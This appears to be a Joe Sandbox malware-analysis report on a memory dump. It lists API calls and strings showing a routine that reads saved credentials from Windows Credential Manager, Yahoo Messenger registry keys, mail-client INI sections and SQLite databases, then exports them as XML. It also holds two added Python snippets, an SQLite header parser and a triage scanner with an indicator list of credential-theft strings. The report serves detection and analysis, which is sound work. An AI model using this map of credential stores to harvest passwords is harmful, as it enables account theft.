                                                              • Instruction ID: aa4dc9b89352709bd4c521be83aedc2b1fb2a96970f66ede65b30d7c79a4835d
                                                              • Opcode Fuzzy Hash: db1fe4889964b4b4561ff1fa413a374de4b2b8250443d72fdef4f343b664ad1c
                                                              • Instruction Fuzzy Hash: 96513B7290015DAFDB10EF95CC81AEEB7B8FB44308F5445AAE509A7141EB34EA898F94
                                                              APIs
                                                                • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                                              • strlen.MSVCRT ref: 0040F7BE
                                                              • _mbscpy.MSVCRT(00000000,?,?,00000000), ref: 0040F7CF
                                                              • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                                              • String ID: Passport.Net\*
                                                              • API String ID: 2329438634-3671122194
                                                              • Opcode ID: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                              • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                                                              • Opcode Fuzzy Hash: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                              • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                                                              APIs
                                                                • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                              • memset.MSVCRT ref: 0040330B
                                                              • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                              • strchr.MSVCRT ref: 0040335A
                                                                • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                              • strlen.MSVCRT ref: 0040339C
                                                                • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                              • String ID: Personalities
                                                              • API String ID: 2103853322-4287407858
                                                              • Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                              • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                              • Opcode Fuzzy Hash: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                              • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastMessagesprintf
                                                              • String ID: Error$Error %d: %s
                                                              • API String ID: 1670431679-1552265934
                                                              • Opcode ID: 01084951b307502bfaf43d4fbd3e54dffba0eab1b535d90173241ec551fbeaa7
                                                              • Instruction ID: a7eabb7ac59324d00fe13b249bdc4a7432a02f94c8438c44d3dfd779c6ab1540
                                                              • Opcode Fuzzy Hash: 01084951b307502bfaf43d4fbd3e54dffba0eab1b535d90173241ec551fbeaa7
                                                              • Instruction Fuzzy Hash: AEF0A77A8001086BDB10A7A4DC05FA676BCBB44344F1500B6B945F2151EA74DA058F98
                                                              APIs
                                                              Strings
                                                              • foreign key on %s should reference only one column of table %T, xrefs: 00430A3D
                                                              • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430A65
                                                              • unknown column "%s" in foreign key definition, xrefs: 00430C59
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                              • API String ID: 3510742995-272990098
                                                              • Opcode ID: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                              • Instruction ID: 56a33166dce8f22c91c9f8fabbbf61fd3f81eb66f6c7064346fd2a8112c6bbd6
                                                              • Opcode Fuzzy Hash: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                              • Instruction Fuzzy Hash: 32A14A71A00209DFCB14DF98D5909AEBBF1FF49704F24925EE805AB312D739EA41CB98
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset
                                                              • String ID: H
                                                              • API String ID: 2221118986-2852464175
                                                              • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                              • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                                              • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                              • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                              • API String ID: 3510742995-3170954634
                                                              • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                              • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                                                              • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                              • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                                                              APIs
                                                                • Part of subcall function 0041384F: memcpy.MSVCRT(?,00417664,00000004,?,CwA,00417664,?,?,00417743,?,?,?,?), ref: 0041385C
                                                              • memcmp.MSVCRT(?,?,00000004,00000000,?,?,0041DE5E,?,?,?,?,00436073), ref: 0041DBAE
                                                              • memcmp.MSVCRT(?,SQLite format 3,00000010,00000000,?,?,0041DE5E,?,?,?), ref: 0041DBDB
                                                              • memcmp.MSVCRT(?,@ ,00000003,?,?,?,00000000,?,?,0041DE5E,?,?,?), ref: 0041DC47
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcmp$memcpy
                                                              • String ID: @ $SQLite format 3
                                                              • API String ID: 231171946-3708268960
                                                              • Opcode ID: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                                              • Instruction ID: bab8e9e22e0f3e3322208b515ecc9156aa125374c4e71f07eecd891e4e8170cf
                                                              • Opcode Fuzzy Hash: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                                              • Instruction Fuzzy Hash: 1851BFB1E002099BDB20DF69C981BEAB7F4AF54304F10056FE44597742E7B8EA85CB98
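The record above shows an embedded SQLite engine validating page 1 of a database: a 16-byte memcmp against "SQLite format 3" and a 3-byte memcmp against "@  " (bytes 0x40 0x20 0x20, the fixed payload fractions 64/32/32 at header offsets 21..23). The snippet below is an added example, not Joe Sandbox output and not code from the sample: it performs the same header checks in Python, following the public SQLite file-format layout, and decodes the fields a credential-recovery routine needs (page size, text encoding, page count) before it can read a browser's logins or cookies database. The sample header bytes are constructed here, not taken from the analysed dump.

```python
"""SQLite page-1 header check mirroring the embedded-SQLite memcmp calls.

Added example for this report; not Joe Sandbox output and not code from
the sample. Layout follows the public SQLite file-format spec. The header
bytes produced by build_header() are constructed for offline testing.
"""
import struct

MAGIC = b"SQLite format 3\x00"   # 16 bytes at offset 0  (memcmp ..., 0x10)
PAYLOAD_FRACTIONS = b"@  "       # bytes 21..23 must be 64, 32, 32 (memcmp "@  ", 3)
TEXT_ENCODINGS = {1: "UTF-8", 2: "UTF-16le", 3: "UTF-16be"}


class SQLiteHeaderError(ValueError):
    """Raised when page 1 fails the same checks SQLite itself applies."""


def parse_sqlite_header(page1: bytes) -> dict:
    """Validate and decode the 100-byte database header at the start of page 1."""
    if len(page1) < 100:
        raise SQLiteHeaderError("need at least 100 bytes of page 1")
    if page1[:16] != MAGIC:
        raise SQLiteHeaderError("bad magic: not an SQLite 3 file")

    # Page size is big-endian 16-bit; the value 1 encodes 65536.
    page_size = struct.unpack_from(">H", page1, 16)[0]
    if page_size == 1:
        page_size = 65536
    if page_size < 512 or page_size > 65536 or page_size & (page_size - 1):
        raise SQLiteHeaderError(f"invalid page size {page_size}")

    write_version, read_version, reserved = page1[18], page1[19], page1[20]
    if read_version > 2:
        raise SQLiteHeaderError("read version > 2: file is newer than this parser")

    # Fixed payload fractions; corrupt or non-SQLite data fails here.
    if page1[21:24] != PAYLOAD_FRACTIONS:
        raise SQLiteHeaderError("payload fractions are not 64/32/32")

    usable = page_size - reserved
    if usable < 480:
        raise SQLiteHeaderError("usable page size below 480 bytes")

    (change_counter, page_count, freelist_trunk, freelist_count, schema_cookie,
     schema_format, cache_size, largest_root, text_encoding, user_version,
     incr_vacuum, app_id) = struct.unpack_from(">12I", page1, 24)
    if text_encoding not in TEXT_ENCODINGS:
        raise SQLiteHeaderError(f"unknown text encoding {text_encoding}")
    version_valid_for, sqlite_version = struct.unpack_from(">II", page1, 92)

    return {
        "page_size": page_size,
        "usable_size": usable,
        "write_version": write_version,
        "read_version": read_version,
        "page_count": page_count,
        "schema_cookie": schema_cookie,
        "schema_format": schema_format,
        "text_encoding": TEXT_ENCODINGS[text_encoding],
        "autovacuum": largest_root != 0,
        "sqlite_version": sqlite_version,
    }


def is_sqlite_db(page1: bytes) -> bool:
    """True when page 1 passes every check above."""
    try:
        parse_sqlite_header(page1)
    except SQLiteHeaderError:
        return False
    return True


def build_header(page_size=4096, text_encoding=1, page_count=3,
                 sqlite_version=3045000) -> bytes:
    """Construct a well-formed 100-byte header (test data, not a real database)."""
    h = bytearray(100)
    h[0:16] = MAGIC
    struct.pack_into(">H", h, 16, 1 if page_size == 65536 else page_size)
    h[18] = h[19] = 1            # legacy rollback-journal read/write versions
    h[20] = 0                    # no reserved bytes per page
    h[21:24] = PAYLOAD_FRACTIONS
    struct.pack_into(">12I", h, 24,
                     7, page_count, 0, 0, 5, 4, 0, 0, text_encoding, 0, 0, 0)
    struct.pack_into(">II", h, 92, 7, sqlite_version)
    return bytes(h)


if __name__ == "__main__":
    print(parse_sqlite_header(build_header()))
```

The 4-byte memcmp at 0041DBAE compares a value whose operand is not recoverable from the listing, so it is not reproduced here; the two string comparisons are the ones that identify this routine as SQLite's own page-1 validation.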
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memset
                                                              • String ID: winWrite1$winWrite2
                                                              • API String ID: 438689982-3457389245
                                                              • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                              • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                                              • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                              • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpymemset
                                                              • String ID: winRead
                                                              • API String ID: 1297977491-2759563040
                                                              • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                              • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                              • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                              • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                              APIs
                                                              • memset.MSVCRT ref: 0044955B
                                                              • memset.MSVCRT ref: 0044956B
                                                              • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                              • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpymemset
                                                              • String ID: gj
                                                              • API String ID: 1297977491-4203073231
                                                              • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                              • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                              • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                              • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                              APIs
                                                                • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                                              • memset.MSVCRT ref: 0040AB9C
                                                                • Part of subcall function 00411004: memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                              • sprintf.MSVCRT ref: 0040ABE1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
                                                              • String ID: <%s>%s</%s>$</item>$<item>
                                                              • API String ID: 3337535707-2769808009
                                                              • Opcode ID: 2bb92dba7cae12865da671c0fcd3b112093d4a92d1dc9d46927f4f4684118477
                                                              • Instruction ID: d3fada9700ccfca67da5e06a008153287a477451e6e6bd371d19fa9d49944530
                                                              • Opcode Fuzzy Hash: 2bb92dba7cae12865da671c0fcd3b112093d4a92d1dc9d46927f4f4684118477
                                                              • Instruction Fuzzy Hash: 50110631A00216BFEB11AF18CD42F99BB64FF0831CF10402AF509665A1DB79B970CB98
                                                              APIs
                                                              • memset.MSVCRT ref: 00444573
                                                                • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: QueryValuememset
                                                              • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID$`{g
                                                              • API String ID: 3363972335-420339233
                                                              • Opcode ID: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                                              • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                                              • Opcode Fuzzy Hash: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                                              • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
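The string records above (Passport.Net\*, Software\Yahoo\Pager, Yahoo! User ID, EOptions string, the Personalities INI section, the SQLite magic, and the ISO-8859-1 XML export) are what a responder would search other process dumps for to find the same credential-recovery component. The scanner below is an added triage example, not a Joe Sandbox signature and not a vendor YARA rule: it searches a dump for each string in both ASCII and UTF-16LE form and flags the dump when a credential source appears together with the export or database plumbing. Which application each string points at is this example's own inference from the report, labelled in the code; the sample dump bytes are constructed.

```python
"""Triage scan of a memory dump for the credential-recovery strings listed
in the report records.

Added example, not Joe Sandbox output and not a rule from any vendor. The
category assigned to each string is an assumption made here from the
report's String IDs; SAMPLE_DUMP is constructed, not a real dump.
"""
import re

# Needle -> inferred credential source (this example's own labels).
INDICATORS = {
    b"Software\\Yahoo\\Pager": "yahoo-messenger",
    b"Yahoo! User ID": "yahoo-messenger",
    b"EOptions string": "yahoo-messenger",
    b"Passport.Net\\*": "credman-passport",     # assumed: Credential Manager filter
    b"Personalities": "mail-ini-section",        # assumed: INI-based mail client identities
    b"SQLite format 3": "sqlite-engine",         # embedded DB reader, not a source itself
    b'<?xml version="1.0" encoding="ISO-8859-1" ?>': "xml-export",
    b"<item>": "xml-export",
}
PLUMBING = {"sqlite-engine", "xml-export"}       # supporting code, not credential sources


def scan_dump(blob: bytes) -> list:
    """Return sorted (offset, indicator, category, encoding) tuples for every hit."""
    hits = []
    for needle, category in INDICATORS.items():
        text = needle.decode("ascii")
        forms = (("ascii", needle), ("utf16le", text.encode("utf-16-le")))
        for encoding, pattern in forms:
            for m in re.finditer(re.escape(pattern), blob):
                hits.append((m.start(), text, category, encoding))
    return sorted(hits)


def triage(blob: bytes) -> dict:
    """Flag a dump when one credential source co-occurs with export/DB plumbing,
    or when two independent credential sources are present."""
    hits = scan_dump(blob)
    categories = {h[2] for h in hits}
    sources = categories - PLUMBING
    flagged = len(sources) >= 2 or (len(sources) >= 1 and bool(categories & PLUMBING))
    return {"hits": hits, "categories": sorted(categories), "flagged": flagged}


# Constructed dump: filler bytes with indicator strings placed among them.
SAMPLE_DUMP = (
    b"\x00" * 64
    + b"Software\\Yahoo\\Pager\x00Yahoo! User ID\x00EOptions string\x00"
    + b"\x90" * 32
    + b"Passport.Net\\*\x00"
    + "SQLite format 3".encode("utf-16-le")
    + b"\xcc" * 16
    + b'<?xml version="1.0" encoding="ISO-8859-1" ?>'
)


if __name__ == "__main__":
    result = triage(SAMPLE_DUMP)
    for offset, text, category, encoding in result["hits"]:
        print(f"{offset:#010x} {encoding:8} {category:18} {text}")
    print("flagged:", result["flagged"])
```

The co-occurrence rule keeps a lone INI section name like "Personalities" or a bare SQLite header from flagging ordinary processes; a real rule set would add the API-level evidence the report lists alongside the strings (RegQueryValueExA on the Yahoo key, GetPrivateProfileSectionA, the dynamically resolved credential API).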
                                                              APIs
                                                              • GetParent.USER32(?), ref: 004090C2
                                                              • GetWindowRect.USER32(?,?), ref: 004090CF
                                                              • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                              • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                              • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Window$Rect$ClientParentPoints
                                                              • String ID:
                                                              • API String ID: 4247780290-0
                                                              • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                              • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                              • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                              • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                              APIs
                                                              • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B9B1
                                                                • Part of subcall function 00406C62: LoadCursorA.USER32(00000000,00007F02), ref: 00406C69
                                                                • Part of subcall function 00406C62: SetCursor.USER32(00000000), ref: 00406C70
                                                              • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B9D4
                                                                • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B929
                                                                • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B953
                                                                • Part of subcall function 0040B903: _mbscat.MSVCRT ref: 0040B966
                                                                • Part of subcall function 0040B903: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                              • SetCursor.USER32(?,?,0040CBD2), ref: 0040B9F9
                                                              • SetFocus.USER32(?,?,?,0040CBD2), ref: 0040BA0B
                                                              • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040BA22
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
                                                              • String ID:
                                                              • API String ID: 2374668499-0
                                                              • Opcode ID: fb4c2d2117a6e63931818c59792b7e5b7d388045a30bfc7bbc7a4f43378f101d
                                                              • Instruction ID: f32a2dbc35f7bf6d698eec3472f2a5e56a7287d41e7566127b95ec9cf4f32314
                                                              • Opcode Fuzzy Hash: fb4c2d2117a6e63931818c59792b7e5b7d388045a30bfc7bbc7a4f43378f101d
                                                              • Instruction Fuzzy Hash: 450129B5204604EFD326AB75DC85FA6B7E8FF48305F0504B9F2499B271CA716D018B14
                                                              APIs
                                                              • memset.MSVCRT ref: 0040AD5B
                                                              • memset.MSVCRT ref: 0040AD71
                                                                • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                                                • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                              • sprintf.MSVCRT ref: 0040ADA8
                                                              Strings
                                                              • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040AD76
                                                              • <%s>, xrefs: 0040ADA2
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                              • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                              • API String ID: 3699762281-1998499579
                                                              • Opcode ID: 795a8691700f312257f705e85a86cce67b218055e3179b2cedf5ba95f87480a6
                                                              • Instruction ID: d8254de8a9900f2911fb5d1c0b13fc0cc865a5027b69882d7a9a790f368f6919
                                                              • Opcode Fuzzy Hash: 795a8691700f312257f705e85a86cce67b218055e3179b2cedf5ba95f87480a6
                                                              • Instruction Fuzzy Hash: 49012B7294012877E721A719CC46FDABB6C9F54304F0500F7B50DF3082DBB8AB508BA4
                                                              APIs
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??3@
                                                              • String ID:
                                                              • API String ID: 613200358-0
                                                              • Opcode ID: b88760ef2a9cfab350ce0474c381e2ce36942e7c393404a0687f9da8e94e787a
                                                              • Instruction ID: b8efe39ffa321d4f2ce8ce974eba3160cbf96dc633dc1e2aadb4e529a4dc2577
                                                              • Opcode Fuzzy Hash: b88760ef2a9cfab350ce0474c381e2ce36942e7c393404a0687f9da8e94e787a
                                                              • Instruction Fuzzy Hash: A9F0F4726057855BD7209F6999C1A57F7D9BB98714791083FF189F3A81CB38FC404A18
                                                              APIs
                                                                • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
                                                                • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
                                                                • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
                                                                • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
                                                                • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AB3
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AC6
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AD9
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AEC
                                                              • free.MSVCRT ref: 00409B00
                                                                • Part of subcall function 00407A55: free.MSVCRT ref: 00407A5C
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??3@$free
                                                              • String ID:
                                                              • API String ID: 2241099983-0
                                                              • Opcode ID: 31fdcc5134ad351e7c18f58886b056bef117553105c5edd8e205bd7bfa1d52a3
                                                              • Instruction ID: 0e1833da384361268bbd99a4020487bffb4c29eeff2b5ca4c2d3cb4a232d8152
                                                              • Instruction Fuzzy Hash: 3FF0A932F068B05BC2117B669002B0EB398AD81B2831A016FF8147B6D2CB3CBC504ADE
                                                              APIs
                                                                • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                                                                • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                                                                • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
